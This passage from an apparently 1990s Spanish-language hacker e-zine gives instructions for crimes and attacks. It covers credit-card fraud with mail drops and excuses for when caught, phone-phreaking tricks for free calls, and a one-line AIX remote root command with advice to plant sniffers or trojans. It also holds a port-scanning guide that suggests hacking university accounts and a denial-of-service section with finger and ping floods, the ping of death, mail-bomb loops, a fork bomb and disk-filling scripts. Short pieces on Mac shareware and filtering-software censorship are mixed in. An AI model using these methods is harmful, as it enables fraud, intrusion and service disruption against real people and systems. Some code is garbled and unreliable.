como el mas dificil pero si no han pasado mas de 2 o 3 dias desde que
hiciste el pedido no existira problema alguno. Simplemente vas con tu llave
del apartado postal a la oficina de correo temprano y sacas tu paquete
rapido. Procura usar un sistema de transporte publico para alejarte del
lugar por si las dudas...

Es necesario recordarte que no vuelvas a usar el mismo apartado bajo ninguna
circunstancia y cuando tengas lo que hayas pedido nunca se te ocurra decir
como lo obtuviste. Cuando completes tu primer compra con carding espera
algun tiempo antes de empezar a usar lo que pediste y no tires las envolturas
ya que en caso de que algo te haya salido mal solo necesitaras regresar la
mercancia tal y como la recibiste para salir del aprieto :-)

.Apendice

Vendedores por Telefono en Mexico:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
CV directo
~~~~~~~~~~
* Entregan de 3 a 5 dias
* Aceptan Bancomer, Banamex, Mastercard, etc.
* Pregunta por Catalogo. Tienen equipo de computo pero tambien
maquinas de ejercicio, cuchillos, medicinas, videos, etc.
* 01 (5) 6288528

Desconocido
~~~~~~~~~~~
* No se cuanto tarden en entregar.
* Aceptan Bancomer, Banamex, Mastercard, etc.
* Pregunta por Catalogo. Tienen muchos productos.
* 01 (5) 2781141

Excusas validas en caso de aprietos:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
" No se como llego este paquete a mi direccion! Alguien debio haberlo
enviado aqui por equivocacion... "

" Pense que alguien de la casa lo habia pedido pero cuando les pregunte
quien fue todos dijeron que no era de ellos asi que decidi guardarlo
hasta que supiera de quien era... "

" Oh dios mio asi que asi fue como llego esto a mi direccion ¨Eh?

  
"

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð http://www.microsoft.com "
Que sistema quieres hackear hoy ? " ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

*******************
> PHREAKING & HACKING <
*******************

"
No hay nadie mas esclavisado que aquel
que falsamente piensa que es libre."

Bien primero que nada me llamo Azum Lord y este truco sirve para tener
llamadas totalmente !!! GRATIS !!!! y es el siguiente:

Tienes que escribirlo tal y como esta incluyendo el #.

Primero marcas:
91 800 92 450 #

Despues te contesta una operadora y marcas lo sig.
100 54 #

Y despues
10 54 #

Y para finalizar
00 91 84 ( Aqui va el telefono a donde quieres hablar ) #

NOTA: En el ejemplo de arriba el 84 es el codigo de la ciudad a donde
quieres hablar en este ejemplo es de Saltillo Coahuila, Mexico. Por el momento
el truco ya no funciona dentro de Saltillo pero puede hacerlo de otras partes.

Para llamar gratis de un telefono gratuito:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Primero marcas a un numero gratituo antes (91 800) ahora (01 800)
cuando contesten lo que tienes que hacer es hacer que el que te conteste te
cuelgue e.j.

Cia -Bueno habla XXXXX en que le puedo ayudar???
Hacker -Si bueno quien habla????
Cia -Bueno????
Hacker -Bueno, Bueno, Bueno Se¤orita que se le ofrece???
Cia -*&^$%@#$(*&$#@

Y ahi esta, ella te cuelga y te deja con tono y puedes hacer tu
llamada. je, je };-)
Nota: En algunos telefonos de tarjeta les cancelan este tipo de llamadas.

[ Este truco no sirve en telefonos publicos Telnor de tarjeta y moneda. De
hecho aun no se en que tipo de telefonos funcione ;) ]

Si alguien tiene problemas con un sistema AIX 3.x la forma mas sencilla de
conseguir r00t es usando el comando rhost como en el siguiente ejemplo:

% rhost (host) -l -froot
^ |
| |________________ El host con el sistema AIX (Unix de IBM)
|--- Representa el prompt!

Y !!!! Bingo ­­­­ tienes el root antes de entrar te recomiendo que tengas
preparado un zap, sniffer o caballo de troya listos para ser compilados
te lo digo por experiencia :-(

si tienen algun sniffer para AIX 3.2 les pido me lo manden :-).
[ Y tambien a la revista :) ]

Si quieren conseguir bugs, exploits, sniffers, zaps, listas de palabras,
hasta software benigno de seguridad visiten esta pagina de rumania:

http://sunshine.nextra.ro

Tambien hay un enlace para una pagina donde hay exploits, trojans ping's of
death, etc. para WinNT !!!!!.

Listas de Palabras:

ftp://sable.ox.ac.uk/pub/wordlists/
ftp://sun.rediris.es/mirror/sable/wordlists/

Esta es una BBS del merito Monterrey N.L.
sinet.sinet.com.mx
~~~~~~~~~~~~~~~~~~
Para registrarse en el login se escribe bbs ya adentro para registrarte te
tienen que enviar un mail pero no se tarda mas de 1 min.

ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\ï\
U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\

Esta es una forma de hackear el programa Crow Control que regula algunas
funciones de windows como por ejemplo quita el comando ejecutar, ayuda,
configuracion y buscar del menu inicio, quita las funciones del boton derecho
del mouse el MSDOS y el explorer, tambien al iniciar la computadora no lee la
unidad a:, incluso oculta la unidad C:, a simple vista parece imposible
quitarlo pero si te vas al wordpad en accesorios, seleccionas Abrir, luego
parece que no hay unidad c: pero tu escribes c:\autoexec.bat y bingo aparecen
los directorios y entonces comienzas a editar y agregas estas lineas:

cd\
cd archiv~1 (la mayoria de las veces esta aqui recomiendo que lo verifiques
antes de editar el autoxec.bat )
path=c:\windows\command\
deltree /y crow*.*

Y listo ahora solo tienes que reiniciar y de esta forma es facil quitar el
Crow Control aunque tambien funciona con otros programas parecidos.

[ Si quisieramos remover el programa pero no permanentemente editariamos el
autoexec.bat de esta forma:

cd\
cd archiv~1
md temp
path=c:\windows\command\
move crow* temp

Ahora todos los archivos del programa Crow habran quedado en:
C:\ARCHIVOS\TEMP\CROW* ( * representa el nombre del directorio completo ) ]

3zP3r0 Ke L3z gUz73 ..... AzumLord@Hotmail.com

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð Y ahora un StripTease por . . . Cinthia !! ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

LOS HACKERS DE LAS MACINTOSH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Macz l0v3r:Nopal Picudo
^^^^^^^^^^^^^^^^^^^^^^^
Entre los downloads mas populares en internet estan varias aplicaciones y
extensiones escritas por Greg Landweber. Probablemente no reconozcas el
nombre de este matematico graduado de Harvard, musico y desarrollador de
shareware. Pero probablemente hayas escuchado de Aaron, la extension que
modifica la interfaz de la Mac para verse como el sistema prometido de Apple
"
System 8". Y quizas hayas probado BeView, que hace parecer a tu Mac como el
proximo BeOS.
Recientemente Landweber, con amigos como Ed Voas y Fred Bass sacaron
Kaleidoscope, una version mejorada de Aaron que ofrece una variedad de
colores como Onyx y Ice. Hasta el momento la mayoria de las "
escenas de
colores" son un poco raras por ejemplo una de las escenas cambia el boton
de cerrar ventana por una esfera rosa. Lo mejor de Kaleidoscope es que
permite a cualquier desarrollador escribir sus propios dise¤os para la
Mac. Algunos dise¤os nuevos como Star Wars estan saliendo.
Kaleidoscope no a¤ade ninguna funcion practica a las Macs - a¤ade otra cosa
que habia sido desterrada: diversion, en algunos casos hermosa. La primera
Mac nos dio iconos, menus de cascadas, ventanas y el puntero. Pero Apple
se ha dormido en el volante. Afortunadamente Landweber, Voas y Bass estan
manteniendo viva la tradicion de dise¤o ingenioso de Apple.

Si lo que buscas es funcionalidad, el browser de Greg ofrece una simple
pero inovadora forma de acceder a los contenidos de tu computadora. La
ventana del monitor se divide en 3 o 4 paneles que te permiten desplazar por
todo el disco duro manteniendo la vista en distintos directorios al mismo
tiempo - puedes encontrar archivos sin abrir demasiadas ventanas. Tambien
podrias arrastrar hasta 8 iconos en espacios colocados en la parte superior
de la pantalla para acceso instantaneo. La mejor cosa de este browser es que
permite sumergirnos en archivos stuffit tan facil como si fueran directorios.
El shareware que Greg's produce para las Macs lo puedes encontrar en:
http://greg.math.harvard.edu

Mientras Apple se fusiona con la nueva generacion de sistemas operativos -
Rhapsody esta prometido para 1998 - Landweber nos permite probar la interfaz
del futuro ahora. Apple recientemente contrato a Ed Voas el co-desarrollador
de Aaron para dirigir la division de dise¤o. Parece que Apple reconoce al
talento cuando lo ve.

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
𠨨RareGaZz?? Punks!! ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

+ CYBERsitter +
"
¨a donde NO quieres que vayan hoy?"

Solid Oak Software, los creadores de CYBERsitter promueven su producto como
una forma mediante la cual los padres podran "
limitar el acceso de los ni¤os
al material dudoso de Internet". Pero la lista de web sites, palabras y
frases que son filtradas por el programa estan guardados en un archivo
encriptado por lo que ni los usuarios registrados pueden saber que es
exactamente lo que CYBERsitter bloquea excepto intentando y fallando.

Como resultado de esto, poca gente sabia en realidad que era lo que este
programa bloqueaba a los usuarios pero en Julio de 1996 varios grupos
que apoyan los derechos de gays/lesbianos se quejaban que Cybersitter
filtraba las palabras "
homosexual" y "gay rights" de las paginas web. Entre
los sitios bloqueados se encuentran la Organizacion Nacional de las Mujeres
http://www.NOW.org y la Organizacion de los Derechos Humanos de Gays en
http://www.iglhrc.org. Ese Julio, un articulo fue publicado en CyberWire
por Brock Meeks que advertia del tipo de material que era bloqueado por
CYBERsitter, Cyber Patrol y Net Nanny. El articulo esta disponible en:
http://www.eff.org/pub/Publications/Declan_McCullagh/cwd.keys.to.the.kingdom.0796.article

Brian Milburn, CEO de Solid Oak Software, amenazo con una investigacion
criminal por medio del FBI quejandose que el conocimiento de la gente del
material bloqueado por su programa devaluaba su producto:
http://peacefire.org/archives/SOS.letters/bm.2.dm.8.15.96.txt

En noviembre de 1996, Peacefire publico una pagina que criticaba a
CYBERsitter en: http://www.peacefire.org/censorware/CYBERsitter/
exponiendo mas paginas, palabras y frases que el programa bloqueaba.

Ahora, CYBERsitter esta bloqueando el web site de Peacefire entero y ha
amenazado con una demanda contra Peacefire por publicar la pagina.
CYBERsitter tambien ha bloqueado `The Ethical Spectacle' por publicar una
copia de este articulo.

En respuesta a CYBERsitter se creo el programa CSDECODE.EXE que permite a
cualquier persona que tenga una copia de este programa saber que tipo de
websites y palabras filtra este programa. Este programa es considerado un
fuerte golpe contra las ventas de Cybersitter.

Por otro lado yo creo que es un alivio para los padres el dejar la
responsabilidad moral y social de educar a sus hijos a una pieza de software.
Despues de todo nuestros padres no son mas que codigo amaestrado y repleto de
bugs asi que si una compa¤ia promete reemplazarlos y de paso quitarles la
molestia de educar a sus hijos ­fenomenal! ­Viva la mediocridad en las
familias! - ­viva la irresponsabilidad! ­­ VIVA CYBERsitter !!

El programa puedes bajarlo aqui :
http://www.pow-dist.co.uk/solidoak/cyber.html
ftp://ftp.pow-dist.co.uk/pub/demos/cybsetup.exe

Y el crack para ver la lista de sitios bloqueados puedes bajarlo en la
pagina de software de la revista seccion Internet.

Original por: Bennett Haselton
Llevado a la pantalla por: LePompeItor

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð Y ahora un ensayo sobre la inmortalidad del espiritu... ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

* PUERTOS *
cmeinel@techbroker.com

Un puerto en la computadora es por donde la informacion fluye hacia dentro
o hacia fuera. Los dispositivos Hardware como la impresora o modem pueden
ser llamados puertos, un puerto que manda informacion fuera de tu computadora
puede ser el monitor o la impresora. Un puerto que recibe informacion seria
el modem o un scanner.

La diferencia entre un puerto de Internet a un puerto comun es que un Host
de internet tiene muchos mas puertos que un computadora tipica. Ademas,
los puertos de un Host no son Hardware sino software y estan identificados
por su numero que los identifica y define sus funciones.

El "
surfeo de puertos" es cuando se estudian todos los puertos de un Host
buscando una forma de entrar al sistema. El surfeo de puertos se aprovecha
de la estructura del protocolo TCP/IP. El protocolo TCP/IP como ya se ha
dicho muchas veces es el conjunto de reglas que usan las computadoras
conectadas a internet para poder compartir datos. Una de las funciones mas
basicas de UNIX es asignar un puerto a cada funcion que una computadora
quiera que otra haga. Los ejemplos mas comunes podrian ser el puerto para
mandar email (25), Telnet(23), ftp(21) y http(80).

Cuando el browser quiere leer una pagina web contacta al Host usando el
puerto numero 80 y le dice a la computadora que maneja ese sitio web que
te deje entrar. Y seguramente, te dejaran entrar y leer la pagina sin la
necesidad de un login o password.

La mayoria de las computadoras en internet te permitiran usarlas sin la
necesidad de un password. Esto es gracias a los standards de internet.

A pesar de que ningun manual de unix te ense¤ara como hacer el surfeo de
puertos esto es basico para lograr entrar en un sistema si no tenemos
ninguna otra forma de hacerlo (logins defaults, bugs). El surfeo de puertos
es necesario para localizar debilidades en un sistema y explotarlas, si
queremos evitarnos trabajo podemos usar un programa como Satan o Netcat.
Estos programas que puedes ejecutar desde Linux, FreeBSD o cualquier tipo
de UNIX desde la PC y avisaran que puertos de un host estan en uso y checaran
cada uno en busca de fallas y avisaran cuales son. Obviamente las primeras
personas que usan estos programas son los administradores de sistemas por
lo que se recomienda hacer esto manualmente conociendo los errores mas
nuevos de sendmail, daemon o http.

Si quieres empezar en el surfeo de puertos con el pie derecho es necesario
una cuenta de tu ISP que te permita usar Unix, como esto es hoy en dia
muy dificil de conseguir lo mas sencillo que puedes hacer es hackear una
cuenta de alguna universidad o preparatoria donde permitan compilar y usar
todos los comandos Unix. Otra forma de obtener una cuenta SHELL es pagando a
tu universidad o centro de estudios local por una cuenta si no puedes accesar
a esta cuenta via dial-up (numero telefonico) con un programa de
comunicaciones entonces tendras que usar tu conexion PPP con un programa
Telnet, de ahi usa telnet para conectarte a la universidad y listo. Estaras
dentro una cuenta shell.

Si quieres conocer y examinar un dominio y ver que computadoras lo usan
para entrar a internet usamos el comando whois. El siguiente ejemplo es
el original de este archivo y en seguida mostrare algunos otros.

# whois nmia.com

Este comando nos mostrara las computadoras conectadas a este dominio y alguna
otra informacion.

# telnet nmia.com 15

Ahora usamos telnet en el puerto numero 15 que permite ver las estadisticas
de la red -netstat- bajo daemon y mostrara todas las computadoras conectadas
a internet a traves de esta computadora.

Tambien puedes intentar haciendo telnet al puerto de finger (79) para ver
que sucede. Comunmente la conexion sera negada ya que la mayoria de los
sysadmins no permiten el uso de finger por que muestra mucha informacion
sobre los usuarios del sistema. De cualquier forma si logras entrar a un
sistema que tenga en funcionamiento finger puedes preguntar por una direccion
email y te dira el nombre y alguna otra informacion sobre el usuario que te
ayudara a hackear el password :)

Lo primero es usar whois para conseguir las computadoras conectadas a un
dominio, ya que se consigan las direcciones se pueden surfear los puertos
para buscar alguna falla. Una amigo de RareGaZz, GuyBrush nos ha enviado
los resultados de un surfeo a ns.psi.net (192.33.4.10).

Puertos abiertos
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
daytime(13)
discard(9)
domain(53)
exec(512)
ftp(21)
login(513)
shell(514)
sunrpc(111)
telnet(23)
time(37)
uucp(540)

Nuestro amigo ha intentado hacer una conexion via telnet a este sistema pero
al igual que la mayoria de los sistemas protegidos nego la conexion desde
su direccion IP. ( sera este un caso para DNS spoofing?? ).
Para encontrar las computadoras conectadas a cierto dominio puedes hacerlo
en whois.internic.net igual que como lo ha hecho GuyBrush. En esta direccion
podras entrar a la base de datos de internet, tambien podras verificar
direcciones I.P. entre otras cosillas.

Si te conectas a un sistema importante y comienzas a surfear puertos debes
recordar que la mayoria de los daemons que operan esos puertos guardan un
log de los comandos usados.

Bueno si quieres surfear esto es lo basico:

1) Obten una forma de usar los comandos de UNIX (cuenta shell). Como he
dicho, hay distintas formas y la mas recomendable es tener Linux en tu
PC y conectarla a tu ISP. Esto es complicado, si no tienes idea de como
hacerlo ... mejor consiguete a alguien que pueda ayudarte. Yo en lo
particular particione mi disco en dos, uno para Windows 95 (­Hey nadie es
perfecto!) y en la otra Linux. Antes de entrar se me ofrece la opcion
de usar Windows o Linux. Hacer esto me costo alrededor de $50 dolares
por que el programa para particionar el disco y permitir empezar una
sesion con uno de los dos sistemas cuesta, ademas el cd de linux mas algo
de documentacion tambien cuesta :(

2) Usa el comando "
telnet <host> <numero de puerto>" donde <host> es la
direccion internet de la computadora que tratas de visitar y el numero
de puerto es cualquier cosa que se vea divertido.


Numero de Puerto Servicio Lo que hacen

7 echo Cualquier cosa que mandes sera regresado.
9 discard Dev/null -- Basura, lo no deseado en el sys
11 systat Mucha informacion sobre los usuarios
13 La hora y fecha de la computadora host
15 netstat Mucha informacion sobre la red
19 chargen CTRL + C detiene todo lo que vomita
21 ftp Duh?
23 telnet Duh?
25 smpt Para crear email.
37 time La hora.
39 rlp Resource location
43 whois Informacion sobre la red y usuarios
70 gopher Buscador de informacion caducado
79 finger Mucha informacion sobre los usuarios
80 http Servidor Web
110 pop Email que llega
119 nntp Grupos de noticias Usenet
443 shttp Otro servidor web
513 rlogin Remote login
514 shell Comando remoto, sin password!

||||||||||||||||
||serverhacker||
||||||||||||||||

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð 5 minutos para soltar los toros [...] ­­ Comienza la pamplonada !! ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

DENIAL OF SERVICE -Introduccion-
-=La biblia del terrorista=-
por: Swoish

Los ataques conocidos como `denial of service' son en internet lo "
in" o
"
de moda" por la facilidad con que pueden hacerse. Lo unico dificil o
complicado es conseguir un servidor desde donde lanzar el ataque.
Debido a la anatomia de Internet es muy dificil localizar al atacante ya
que antes de llegar al objetivo una se¤al pasa por distintos servidores que
deben ser examinados uno por uno antes de llegar al servidor hostil.

El ataque consiste en descomponer servicios de un host sin permiso como
ejemplo estrellar un sistema. Protegerse de este tipo de ataques es muy
dificil debido a que el sistema UNIX asume que todo funciona correctamente
mientras el ataque esta en progreso.

Las razones por las que cualquier persona pueda estrellar un sistema son
muchas y las mas probables son:
-Debido al status subcultural de la persona.
-Ganar acceso.
-Venganza.
-Razones politicas.
-Razones economicas.
-Por que si.

Es facil ganar acceso a un sistema usando el ataque denial of service ya
que es un gatillo que dispara otro tipos de `agujeros' en un sistema. Comunes
ejemplos pueden ser las versiones antiguas de X-lock que permitian el acceso
al sistema una vez este ha sido estrellado. Para corregir el error es
necesario el acceso fisico al servidor.
El inundado del Syn o Syn flooding puede ser tan solo una parte de un ataque
del tipo IP-spoof.
Tambien algunos programas tienen `agujeros' bajo su startup que pueden ser
usados para ganar status root. Por ejemplo SSH (secure shell).
Bajo un ataque se puede restringir el acceso a ciertas personas al servidor
por lo tanto evitar que realizen su trabajo.

EXISTEN ALGUNOS SISTEMAS OPERATIVOS MAS SEGUROS?
================================================

Esta es una pregunta dificil de contestar y creo que todo depende del
administrador de un sistema UNIX.

Una comparacion con Windows 95 o NT puede ser interesante debido a la gran
cantidad de errores que han sido encontrados en ambos sistemas.
Los sistema UNIX son mucho mas complejos y tienen cientos de programas
adheridos que proporcionan diferentes servicios lo que engrandece el margen
al error desde adentro.

Usando Windows 95 o NT uno se arriesga a distintos metodos de estrellar la
maquina que probablemente funcionarian aunque existen algunos que siempre
funcionan.

En realidad no existe gran diferencia entre Microsoft y UNIX excepto que en
uno de los sistemas se necesita mas preparacion [ adivinen cual? ] que en
el otro. Existen dos puntos importantes que deben considerarse:

- Unix tiene mas herramientas de diagnostico para descubrir un ataque
y monitorear a los usuarios que cualquier otro sistema. Ver que es lo
que trama un usuario bajo Windows es muy dificil.

- El promedio de los administradores Unix tiene mas experiencia que
un tipico administrador de una red microsoft.

Estos dos ultimos puntos le dan ventaja a Unix contra los ataques de negacion
del servicio o denial of service.

Una comparacion de Microsoft y Unix concerniendo ataques externos es mucho
mas dificil. De cualquier forma es una hecho que las redes Microsoft son
mas seguras que las redes Unix debido a que ofrecen menos servicios que un
sistema Unix standard.

OBJETIVOS BASICOS DE UN ATAQUE
==============================

1.Espacio swap
~~~~~~~~~~~~~~
La mayoria de los sistemas tienen cientos de megabytes reservados al espacio
swap para resolver las peticiones del cliente. El espacio swap es tipicamente
usado para forjar procesos menores que tienen un periodo de vida corto. Asi
pues el espacio swap bajo ninguna causa debera ser usado rigurosamente. Una
negacion de servicio podria estar basada en un metodo que trate de llenar el
espacio swap.

2.Tablas del Kernel
~~~~~~~~~~~~~~~~~~~
Es trivial sobrecargar las tablas del kernel para ocasionar serios problemas
al sistema. Los sistemas que escriben a traves de caches y buffers peque¤os
son especialmente sensitivos.

Otro objetivo susceptible es el kernel memory allocation. Todo Kernel o
cerebro tiene un limite para la memoria en su mapa de memoria, si el sistema
alcanza este limite el cerebro no puede colocar mas memoria y el sistema debe
ser reboteado. La memorial del kernel no solo es usada para procesos del
CPU, monitores y asi, pero tambien para procesos ordinarios lo que significa
que cualquier sistema puede ser estrellado con un buen algoritmo lo bastante
rapido. [ trucos disponibles en numeros anteriores de la revista :) ]

3. RAM
~~~~~~
Una negacion del servicio que ocupe grandes cantidades de RAM puede ocasionar
bastantes problemas. NFS y servidores de correo con extremadamente sensitivos
porque casi nunca ocupan mucho RAM por lo tanto tienen poco RAM asignado. Un
ataque a un servidor NFS es comun. El cliente de NFS normal puede hacer mucho
uso del cache, pero un cliente NFS puede ser cualquier programa inclusive uno
que hayas escrito tu mismo...

4. Discos
~~~~~~~~~
Un ataque clasico es llenar el disco duro.


ATACANDO DESDE FUERA
====================

Usando finger
~~~~~~~~~~~~~
La mayoria de las instalaciones de fingerd dejan redireccionar a otro host.
Ejemplo:

$finger @sistema.dos.com@sistema.uno.com

Finger en el ejemplo tendra que ir a traves del sistema.uno.com y despues al
sistema.dos.com. Todo lo que el sistema.dos.com sabe es que el
sistema.uno.com esta contactandole usando finger. Este metodo puede ser usado
para esconderte, pero tambien para hacer uso de un truco sucio. Ejemplo:

$ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.que.atacamos.com

Todos esos signos @ ocasionaran que finger llame a host.que.atacamos.com una
y otra vez... El efecto es desastroso para host.que.atacamos.com resultando
en un uso alto del ancho de banda, falta de memoria y un disco duro con menos
espacio debido a todos los procesos creados.

La solucion es instalar un fingerd que no soporte redirecciones, por ejemplo
el finger GNU. Tambien puedes desinstalar el servicio finger.

Usando telnet
~~~~~~~~~~~~~
Examina este script:

while : ; do
telnet sistema.que.atacamos.com &
done

Un ataque de este tipo comera algo del ancho de banda pero no es nada
comparado con el metodo fingerd. El punto es que algunas firewalls y httpd:s
piensan que el ataque es una loop y se apagan automaticamente hasta que el
administrador mate el proceso con kill -HUP

Broadcast Storms
~~~~~~~~~~~~~~~~
Este es un metodo muy popular en la redes donde todos los hosts actuan como
gateways.
Existen muchas versiones del ataque pero el metodo basico es mandar muchos
paquetes a todos los hosts de la red con una direccion destino inexistente.
Cada host tratara de mandar los paquetes asi que estos `rebotaran' por la red
un buen rato.

Los servicios que pueden ser abusados para hacer esto son ping, finger y
sendmail.

Email Bombing
~~~~~~~~~~~~~
En un ataque de email se envian muchos mensajes identicos a una o muchas
direcciones del host. El efecto en el objetivo es un alto uso del ancho
de banda y menos espacio en disco... Cuando envias muchos mensajes a una
direccion inexistente del host desde otra inexistente un mensaje se
convertira en 3 y regresara para convertirse en 3 de nuevo y asi... Por
mas odioso que se vea este ataque es bastante efectivo y aun no es ilegal
en muchos paises latinoamericanos y europeos.

Ejemplo:
Envia un mail de 100k a noexiste@host.atacado.com desde una direccion que
no exista como noexiste@esta.direccion.duh
Cuando el mensaje llege a host.atacado.com como no existe la direccion
noexiste regresara el mensaje a noexiste@esta.direccion.duh y como esta
direccion tampoco existe ... regresara ahora como un mensaje de 300k y asi...

Otra forma de abusar el email y servidores norteamericanos es juntar varios
remailers. Por ejemplo:
Suponiendo que tenemos nosotros una cuenta en Geocities. Digamos
uno@geocities.com y le decimos que queremos que el mail que llegue a esa
direccion lo mande a dos@bigfoot.com. Ahora en la cuenta dos@bigfoot.com
le decimos que lo mande a tres@iname.com. Y en la cuenta tres@iname.com le
decimos que lo mande a uno@geocities.com ... Despues mandamos un mega o dos
a uno@geocities.com que lo mandara a dos@bigfoot.com y de ahi a
tres@iname.com y de nuevo a uno@geocities.com ... este ataque es lame si
en vez de un mega mandas unos 5 !! En fin, espera represalias si te animas
a hacerlo.


Abuso del FTP anonimo
~~~~~~~~~~~~~~~~~~~~~
Si un servidor FTP anonimo tiene un area que pueda ser escrita puede ser
abusada para un ataque de negacion del servicio. Obviamente el objeto seria
llenar el disco duro.

SYN FLOODING
~~~~~~~~~~~~
El mas famoso de los ataques del tipo denial of service. Phrack y 2600 han
publicado extensos articulos sobre este ataque y codigo para hacerlo.

El ataque se basa en un saludo entre dos hosts incompleto. El host hostil
envia un paquete SYN pero no responde al paquete ACK ocasionando que el
stack TCP/IP espere cierta cantidad de tiempo a que el host hostil responda
antes de cerrar la conexion. Si creamos muchas peticiones de conexion y
no se responde a ninguna el host estara inactivo mucho tiempo esperando
respuesta ocasionando lentitud en los demas servicios.

Ping Flooding
~~~~~~~~~~~~~
Este metodo tiene un gran efecto en el sistema atacado.

Bajo Unix nosotros podriamos intentar algo como: ping -s host
para mandar paquetes de 64 bytes.

Si tienes Windows 95, has click en start, elige run y escribe:
PING -T -L 256 host.que.atacamos.com y comienza 15 sesiones iguales.


Crashing usando Ping
~~~~~~~~~~~~~~~~~~~~
Para detener a un sistema desde una maquina corriendo Windows 95 simplemente
ejecuta:

ping -l 65510 host.que.atacamos.com

Y el sistema se detendra o se re-iniciara.


ATACANDO DESDE DENTRO
=====================

Llenando el disco duro
~~~~~~~~~~~~~~~~~~~~~~~

Si en tu sistema puedes usar el directorio temporal /tmp - /temp /pub/tmp -
pub/temp - pub/incoming o /incoming entonces es posible que llenes el disco
usando un script parecido a este:

while : ;
mkdir .xxx
cd .xxx
done


Uso malicioso de fork()
~~~~~~~~~~~~~~~~~~~~~~~
Si alguien ejecuta este programa C++ el resultado sera un crash en la mayoria
de los sistemas.

#include <sys/types.h>
#include <unistd.h>
#include <iostream.h>

main()
{
int x;
while(x=0;x<1000000;x++)
{
system("
uptime");
fork();
}
}


Para generar un ataque mas sangriento puedes cambiar el comando uptime por
sync.

Crear archivos dificiles de remover
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Todos los archivos pueden ser borrados pero aqui hay algunos dificiles:
( $ simboliza el prompt, ^C es igual a CTRL + C. )

1.-
$ cat > -xxx
^C
$ ls
-xxx
$ rm -xxx
rm: illegal option -- x
rm: illegal option -- x
rm: illegal option -- x
usage: rm [-fiRr] file ...
$

2.-
$ touch xxx!
$ rm xxx!
rm: remove xxx! (yes/no)? y
$ touch xxxxxxxxx!
$ rm xxxxxxxxx!
bash: !"
: event not found
$


Ataque CSH
~~~~~~~~~~
Ejecuta esto bajo /bin/csh despues de modificarlo con el path propio del
shell csh de tu sistema. Busca este path en tu archivo .login

|I /bin/csh
nodename : **************b


DUMPING CORE
============

Uso malicioso de Netscape
~~~~~~~~~~~~~~~~~~~~~~~~~
Bajo Netscape 1.1N este link resultara en un fault de segmentacion y el
sistema arrojara el core.

<a name="http://xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx...>

Swoish@rdk.org

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð Ser o no ser? Leyendo raregazz - hasta el amanecer ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

$$$$$ $$
"
$$$$$$$$$$$$$$$" $$ ooo $$$$$ooo oooo
"
$$$$$$$$$$" "$$" o$$ $$o "$$$$$$$$$ $$$$$$$$$$
$$ "$$$$$$" $$ $$oo $$$$$$$$$$o """ o$$$"
$$$o "$$$$" $$$ o$$" $$$"""$$"" $$$ oooo
$$$$oo $$$$ $$$$$ ooo$$$ooo $$$oooo$$$ o$$$ooooooo$$$$$$$$$
$$$$$$$ooo $$ ooo$$$$$$$ """""""" """""" """""""" """"""""""
$$$$$$$$$$$$$$$$$$$$$$$$$$ oooo ooo
$$$$$$$""" $$o """$$$$$$$ ""$$ $$$$
$$$$"" $$$o ""$$$$ $$$oooo $$$$$$$o oooooo $$$ oooooo
$$$" o$$$$o "$$$ "$$$$""$$o "$$$$ o$$""$$$$ $$" $$$"""
$$ o$$$$$$$ $$ $$$$ $$$ "$$$$""$$$$ $$$ "" $$$$$$ ""
o$$$$$$$$$$o $$$ $$o $$$o o$$$$o $$$ $$"" $$o
o$$$$$$$$$$$$$$$$o o$$$$$ $$$$$ """" """""" "
$$$$$$$" $$$$ $$$$$o

